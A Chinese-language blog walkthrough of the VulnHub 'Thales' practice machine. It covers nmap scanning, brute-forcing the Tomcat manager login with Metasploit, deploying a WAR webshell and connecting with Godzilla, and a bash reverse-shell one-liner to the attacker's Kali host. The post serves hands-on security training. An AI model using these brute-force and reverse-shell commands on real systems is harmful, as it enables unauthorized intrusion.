Thales靶机在网络安全教学与实战中的应用与价值

执念WRD2025-03-26 11:05

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码 
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码 
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码 
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
2503_908249381 小时前
【无标题】
安全
秋说3 小时前
【区块链安全 | 第二篇】区块链概念详解
安全·架构·区块链
神马行空6 小时前
一文解读DeepSeek的安全风险、挑战与应对策略
网络·人工智能·安全·大模型·deepseek
黑客笔记7 小时前
第4章 IP网络扫描(网络安全评估)
网络·tcp/ip·web安全
GCKJ_08247 小时前
观成科技:海莲花利用MST投递远控木马
网络·安全·web安全
秋说8 小时前
【区块链安全 | 第三篇】主流公链以太坊运行机制
安全·区块链
virelin_Y.lin9 小时前
系统与网络安全------网络应用基础(3)
网络·web安全·智能路由器
火绒终端安全管理系统9 小时前
游戏MOD伴随盗号风险,仿冒网站借“风灵月影”窃密【火绒企业版V2.0】
网络·安全·游戏·网络安全·火绒安全
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek各版本说明与优缺点分析04本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程05本地部署DeepSeek教程(Mac版本)06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07苍穹外卖面试总结08FreeCAD傻瓜教程之创建参数化几何图形-螺旋体、平面、球体、椭球体、圆柱体、圆锥体、棱柱、椭圆09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10JS闭包不理解?一杯咖啡的时间带你轻松理解闭包!